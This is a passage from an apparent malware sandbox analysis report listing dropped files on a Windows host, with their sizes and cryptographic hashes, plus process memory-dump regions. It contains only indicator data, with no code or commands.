                                                                                                                                                                                              SHA1

                                                                                                                                                                                              4e1a8c6a53ea9b54eb76f12d99b1327137a47ebd

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              71c5a18d082651484ae96e93f127bac9ac217513976b7e98eeb2b879d643b735

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              85ff44333fc4d47b02cdbc8c665c0bace22a19961e40419227976333ec1384ef8779232d241a9e3b54d988117b84c436f695f0be80dd109ede60fed919ee5fca

                                                                                                                                                                                            • C:\Windows\System32\perfc011.dat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              125KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              eef14d868d4e0c2354c345abc4902445

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              173c39e29dbe6dfd5044f5f788fa4e7618d68d4d

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              9f32176066529c5699d45728fcad1bccce41d19dded4649b49cb24f7eef9ce7f

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              c926f13a0fc900dd7d740e2d7d33cdd1902ece0bfb44b6e1f5fed6ffd348c3e7d71089fb9792e38799e8df6573bc09e67bbe132cf9c2ae0a7199534dc5d959ee

                                                                                                                                                                                            • C:\Windows\System32\perfh007.dat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              710KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              82d7f8765db25b313ecf436572dbe840

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              da9ed48d5386a1133f878b3e00988cbf4cdebab8

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              3053aa67e9cb37cd6f9645ef3bec8d43b1863afd852d3860ea73fcd83c7010c3

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              59766b408b548dc020b54c79a426b361112c33c7263c16ca2e69485dadca05fb4c63b6433063e77c6a9e28a43ec6d3c8206ea702a33b79151fa6309d83b316a8

                                                                                                                                                                                            • C:\Windows\System32\perfh009.dat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              680KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              407f4fed9a4510646f33a2869a184de8

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              e2e622f36b28057bbfbaee754ab6abac2de04778

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              64a9d789cc9e0155153067c4354e1fc8baf3aa319fa870a2047482450811f615

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              1d420ea7ac787df81bbc1534e8fac89227f54fffff70c08c6d2da385762e6c5766448ab4a47aae1c5cbc671776522b6fb6d9c27870b505ae101462bce912867e

                                                                                                                                                                                            • C:\Windows\System32\perfh00A.dat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              754KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              4e62108a0d4a00aa39624f4f941d2595

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              7fbff1d3ac293c715a303ac37da0ceb12591028b

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              3df3adaa8bd1ec4dd99bf304c7a1b0d513097fbeb8648efad4b127c5522c3263

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              c79a483e4012d8c97f4a2188fdc27ea04bae24993b12487551872f1413a1a0884197dc71d13ba1dfd32c9b2c93089761f6f3ec37f0bb19e209dbf19283462126

                                                                                                                                                                                            • C:\Windows\System32\perfh00C.dat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              758KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              b87c7ea0e738fc61eb32a94fbd6c6775

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              0e730aa70900f623205b93cb1d6e11be4c0d51b5

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6cd8b09f644b22c39e02af26b57580baa0fbed01b682d158b29c676d17dac5c0

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              4bad64af992b17a5700cf25ccfa299b2db5be846b8bc28233fa6987964994a34694eb53329ede8d04092298e4b16f06563e459692c210111e0420ee34468f23d

                                                                                                                                                                                            • C:\Windows\System32\perfh010.dat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              747KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              77a299c7d27f4e4372cd6c1de0781586

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              bb6bf16619da6d0acc30797cd10978bde64892fd

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6699946552b9d5ebe64d6854228984a773e413a345816a5597b7d7035d4c09bf

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              21fa8fd59e56018a3d888aed054e4117b246a5ea4568c2df93334d7565d50a512b5fc2c66c09572f7d1363e5b65ddb34d0c072267be78b15681076d2380cf98b

                                                                                                                                                                                            • C:\Windows\System32\perfh011.dat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              475KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              7f2b576ab40800aa5f1e3c163176c1c7

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              7c24fd2342498e1095f58d264078988323834e20

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              f98dfd85751e15486b725d4f36f7ef3fa0d72b76dd48401ce93e68b19e486e60

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              6780454b0ca385ae18baae45ca37103aa69352ce5dcf1f16debe6a49923a4137e4e1471439853ca8a965c12a9a5498b5f634119a1d9daaf5301e43663da7db94

                                                                                                                                                                                            • C:\Windows\System32\wbem\Performance\WmiApRpl.h

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              b133a676d139032a27de3d9619e70091

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              1248aa89938a13640252a79113930ede2f26f1fa

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5

                                                                                                                                                                                            • C:\Windows\System32\wbem\Performance\WmiApRpl.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              29KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              ffdeea82ba4a5a65585103dd2a922dfe

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              094c3794503245cc7dfa9e222d3504f449a5400b

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              c20b11dff802aa472265f4e9f330244ec4aca81b0009f6efcb2cf8a36086f390

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              7570527fdae4818f0fc780f9f141ab6a2d313cc6b3fdb1f7d7ff05d994ad77d3f8d168b1d77c2555d25dc487d24c18f2cc0eab505d1dd758d709f2576aac1a8a

                                                                                                                                                                                            • C:\Windows\sysnldcvmr.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              79KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              0c883b1d66afce606d9830f48d69d74b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              fe431fe73a4749722496f19b3b3ca0b629b50131

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

                                                                                                                                                                                            • F:\$RECYCLE.BIN\S-1-5-21-1045960512-3948844814-3059691613-1000\DDDDDDDDDDD

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              129B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              ef316cf467362848ab57fd3ca3a46d7c

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              2a031b70cd56dbb6e902766b987527b5390c9560

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              45a0cb1efd6d4c7c415935771786d95395c7ba8c828f97cb30c1853e82d2e872

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              22b4c28e7a1e7ca9fff2c14a0532fce8ca95e335462bc7a34dfeaeb15fb2cfea9aca1a58fd10a241b3689dcf68f31558318cf500b1aa682b5c0575a6806c18f8

                                                                                                                                                                                            • memory/1192-3310-0x0000020B2E060000-0x0000020B2E068000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              32KB

                                                                                                                                                                                            • memory/1640-138-0x0000000000EC0000-0x0000000000EC6000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              24KB

                                                                                                                                                                                            • memory/3136-3800-0x00000000056F0000-0x0000000005876000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1.5MB

                                                                                                                                                                                            • memory/3136-3801-0x0000000005450000-0x0000000005472000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              136KB

                                                                                                                                                                                            • memory/3136-3799-0x00000000006E0000-0x0000000000CB2000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.8MB

                                                                                                                                                                                            • memory/3324-110-0x0000000006070000-0x000000000608E000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              120KB

                                                                                                                                                                                            • memory/3324-117-0x0000000007000000-0x000000000700E000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              56KB

                                                                                                                                                                                            • memory/3324-120-0x00000000070E0000-0x00000000070E8000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              32KB

                                                                                                                                                                                            • memory/3324-115-0x0000000007040000-0x00000000070D6000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              600KB

                                                                                                                                                                                            • memory/3324-114-0x0000000006E40000-0x0000000006E4A000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              40KB

                                                                                                                                                                                            • memory/3324-113-0x0000000006DC0000-0x0000000006DDA000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              104KB

                                                                                                                                                                                            • memory/3324-112-0x0000000007470000-0x0000000007AEA000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              6.5MB

                                                                                                                                                                                            • memory/3324-111-0x0000000006A90000-0x0000000006B33000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              652KB

                                                                                                                                                                                            • memory/3324-116-0x0000000006FD0000-0x0000000006FE1000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              68KB

                                                                                                                                                                                            • memory/3324-83-0x0000000004530000-0x0000000004566000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              216KB

                                                                                                                                                                                            • memory/3324-118-0x0000000007010000-0x0000000007024000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              80KB

                                                                                                                                                                                            • memory/3324-119-0x0000000007100000-0x000000000711A000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              104KB

                                                                                                                                                                                            • memory/3324-100-0x000000006F1A0000-0x000000006F1EC000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              304KB

                                                                                                                                                                                            • memory/3324-99-0x0000000006A50000-0x0000000006A82000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              200KB

                                                                                                                                                                                            • memory/3324-98-0x0000000005AD0000-0x0000000005B1C000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              304KB

                                                                                                                                                                                            • memory/3324-97-0x0000000005A90000-0x0000000005AAE000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              120KB

                                                                                                                                                                                            • memory/3324-96-0x00000000055A0000-0x00000000058F4000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3.3MB

                                                                                                                                                                                            • memory/3324-86-0x00000000052C0000-0x0000000005326000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              408KB

                                                                                                                                                                                            • memory/3324-85-0x0000000004AE0000-0x0000000004B02000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              136KB

                                                                                                                                                                                            • memory/3324-84-0x0000000004BA0000-0x00000000051C8000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              6.2MB

                                                                                                                                                                                            • memory/3416-3913-0x0000000000700000-0x0000000000712000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              72KB

                                                                                                                                                                                            • memory/3524-68-0x0000000006DE0000-0x0000000006E30000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              320KB

                                                                                                                                                                                            • memory/3524-36-0x0000000000400000-0x0000000000434000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              208KB

                                                                                                                                                                                            • memory/3524-43-0x0000000005F90000-0x0000000005FF6000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              408KB

                                                                                                                                                                                            • memory/3524-67-0x0000000006900000-0x000000000690A000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              40KB

                                                                                                                                                                                            • memory/3524-40-0x00000000057A0000-0x0000000005D44000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.6MB

                                                                                                                                                                                            • memory/3524-42-0x0000000005400000-0x0000000005418000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              96KB

                                                                                                                                                                                            • memory/3524-41-0x00000000052F0000-0x0000000005382000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              584KB

                                                                                                                                                                                            • memory/3524-69-0x0000000006E40000-0x0000000006E4A000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              40KB

                                                                                                                                                                                            • memory/3544-2-0x0000000004EC0000-0x0000000004F5C000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              624KB

                                                                                                                                                                                            • memory/3544-1-0x0000000000510000-0x0000000000518000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              32KB

                                                                                                                                                                                            • memory/3544-55-0x00000000751EE000-0x00000000751EF000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              4KB

                                                                                                                                                                                            • memory/3544-56-0x00000000751E0000-0x0000000075990000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              7.7MB

                                                                                                                                                                                            • memory/3544-4879-0x00000000751E0000-0x0000000075990000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              7.7MB

                                                                                                                                                                                            • memory/3544-0-0x00000000751EE000-0x00000000751EF000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              4KB

                                                                                                                                                                                            • memory/3544-3-0x00000000751E0000-0x0000000075990000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              7.7MB

                                                                                                                                                                                            • memory/3664-4880-0x00007FFF228A0000-0x00007FFF22F03000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              6.4MB

                                                                                                                                                                                            • memory/3664-3156-0x00007FFF42630000-0x00007FFF4263F000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              60KB

                                                                                                                                                                                            • memory/3664-3158-0x00007FFF2B690000-0x00007FFF2B6BB000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/3664-3341-0x00007FFF228A0000-0x00007FFF22F03000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              6.4MB

                                                                                                                                                                                            • memory/3664-3159-0x00007FFF2B470000-0x00007FFF2B495000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              148KB

                                                                                                                                                                                            • memory/3664-3160-0x00007FFF246E0000-0x00007FFF2485F000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1.5MB

                                                                                                                                                                                            • memory/3664-3360-0x00007FFF228A0000-0x00007FFF22F03000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              6.4MB

                                                                                                                                                                                            • memory/3664-3161-0x00007FFF2C570000-0x00007FFF2C589000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              100KB

                                                                                                                                                                                            • memory/3664-3157-0x00007FFF3AAD0000-0x00007FFF3AAE9000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              100KB

                                                                                                                                                                                            • memory/3664-3322-0x00007FFF228A0000-0x00007FFF22F03000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              6.4MB

                                                                                                                                                                                            • memory/3664-3154-0x00007FFF228A0000-0x00007FFF22F03000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              6.4MB

                                                                                                                                                                                            • memory/3664-3336-0x00007FFF25510000-0x00007FFF255C3000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              716KB

                                                                                                                                                                                            • memory/3664-3233-0x00007FFF2B470000-0x00007FFF2B495000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              148KB

                                                                                                                                                                                            • memory/3664-4877-0x00007FFF246E0000-0x00007FFF2485F000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1.5MB

                                                                                                                                                                                            • memory/3664-3320-0x00007FFF2BF00000-0x00007FFF2BF14000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              80KB

                                                                                                                                                                                            • memory/3664-3314-0x00007FFF26090000-0x00007FFF2615E000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              824KB

                                                                                                                                                                                            • memory/3664-3206-0x00007FFF25510000-0x00007FFF255C3000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              716KB

                                                                                                                                                                                            • memory/3664-3306-0x00007FFF28070000-0x00007FFF280A4000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              208KB

                                                                                                                                                                                            • memory/3664-3205-0x00007FFF2B690000-0x00007FFF2B6BB000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/3664-3162-0x00007FFF425B0000-0x00007FFF425BD000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              52KB

                                                                                                                                                                                            • memory/3664-3242-0x00007FFF246E0000-0x00007FFF2485F000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1.5MB

                                                                                                                                                                                            • memory/3664-3164-0x00007FFF28070000-0x00007FFF280A4000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              208KB

                                                                                                                                                                                            • memory/3664-3307-0x00007FFF1D0A0000-0x00007FFF1D5D3000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.2MB

                                                                                                                                                                                            • memory/3664-3155-0x00007FFF2C590000-0x00007FFF2C5B7000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              156KB

                                                                                                                                                                                            • memory/3664-3264-0x00007FFF2C570000-0x00007FFF2C589000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              100KB

                                                                                                                                                                                            • memory/3664-3163-0x00007FFF228A0000-0x00007FFF22F03000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              6.4MB

                                                                                                                                                                                            • memory/3664-3168-0x00007FFF3B8C0000-0x00007FFF3B8CD000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              52KB

                                                                                                                                                                                            • memory/3664-3167-0x00007FFF2BF00000-0x00007FFF2BF14000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              80KB

                                                                                                                                                                                            • memory/3664-3166-0x00007FFF26090000-0x00007FFF2615E000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              824KB

                                                                                                                                                                                            • memory/3664-3165-0x00007FFF1D0A0000-0x00007FFF1D5D3000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.2MB

                                                                                                                                                                                            • memory/3948-34-0x0000000000C60000-0x0000000000C68000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              32KB

                                                                                                                                                                                            • memory/3948-35-0x00007FFF2A543000-0x00007FFF2A545000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              8KB

                                                                                                                                                                                            • memory/3952-3178-0x00000000003A0000-0x00000000003F2000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              328KB

                                                                                                                                                                                            • memory/3952-3204-0x0000000005910000-0x0000000005986000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              472KB

                                                                                                                                                                                            • memory/3952-3214-0x00000000065E0000-0x000000000662C000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              304KB

                                                                                                                                                                                            • memory/3952-3210-0x0000000006980000-0x0000000006F98000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              6.1MB

                                                                                                                                                                                            • memory/3952-3211-0x00000000064D0000-0x00000000065DA000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1.0MB

                                                                                                                                                                                            • memory/3952-3212-0x0000000006410000-0x0000000006422000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              72KB

                                                                                                                                                                                            • memory/3952-3207-0x0000000006100000-0x000000000611E000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              120KB

                                                                                                                                                                                            • memory/3952-3213-0x0000000006470000-0x00000000064AC000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              240KB

                                                                                                                                                                                            • memory/3968-3238-0x00007FF7136A0000-0x00007FF713C18000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.5MB

                                                                                                                                                                                            • memory/3968-3097-0x00007FF7136A0000-0x00007FF713C18000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.5MB

                                                                                                                                                                                            • memory/4256-3340-0x00007FF66B780000-0x00007FF66BF6F000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              7.9MB

                                                                                                                                                                                            • memory/4256-3359-0x00007FF66B780000-0x00007FF66BF6F000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              7.9MB

                                                                                                                                                                                            • memory/4644-3039-0x00007FFF098B0000-0x00007FFF098C0000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/4644-3069-0x00007FFF076C0000-0x00007FFF076D0000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/4644-3070-0x00007FFF076C0000-0x00007FFF076D0000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/4644-3040-0x00007FFF098B0000-0x00007FFF098C0000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/4644-3037-0x00007FFF098B0000-0x00007FFF098C0000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/4644-3036-0x00007FFF098B0000-0x00007FFF098C0000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/4644-3038-0x00007FFF098B0000-0x00007FFF098C0000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/4756-3305-0x00007FF754AA0000-0x00007FF755037000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.6MB

                                                                                                                                                                                            • memory/4756-3339-0x00007FF754AA0000-0x00007FF755037000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.6MB

                                                                                                                                                                                            • memory/4860-38-0x0000000077C81000-0x0000000077DA1000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1.1MB

                                                                                                                                                                                            • memory/4860-15-0x00000000008A0000-0x0000000000938000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              608KB

                                                                                                                                                                                            • memory/4860-39-0x00000000751E0000-0x0000000075990000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              7.7MB

                                                                                                                                                                                            • memory/4860-16-0x00000000751E0000-0x0000000075990000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              7.7MB

                                                                                                                                                                                            • memory/5104-3995-0x0000000000400000-0x00000000006FB000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3.0MB

                                                                                                                                                                                            • memory/5104-4021-0x0000000000400000-0x00000000006FB000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3.0MB

                                                                                                                                                                                            • memory/5104-3968-0x0000000000400000-0x00000000006FB000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3.0MB

                                                                                                                                                                                            • memory/5688-3338-0x00007FF6DF9C0000-0x00007FF6DF9E9000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              164KB

                                                                                                                                                                                            • memory/5952-3123-0x000001DB4CA60000-0x000001DB4CA82000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              136KB

                                                                                                                                                                                            • memory/6008-3337-0x00007FF73D300000-0x00007FF73DAEF000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              7.9MB

                                                                                                                                                                                            • memory/6008-3239-0x000002B04C780000-0x000002B04C7A0000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              128KB

                                                                                                                                                                                            • memory/6008-3356-0x00007FF73D300000-0x00007FF73DAEF000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              7.9MB

                                                                                                                                                                                            • memory/6016-3127-0x00007FF6F08B0000-0x00007FF6F0E47000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.6MB

                                                                                                                                                                                            • memory/6056-3964-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              164KB

                                                                                                                                                                                            • memory/6056-3922-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              164KB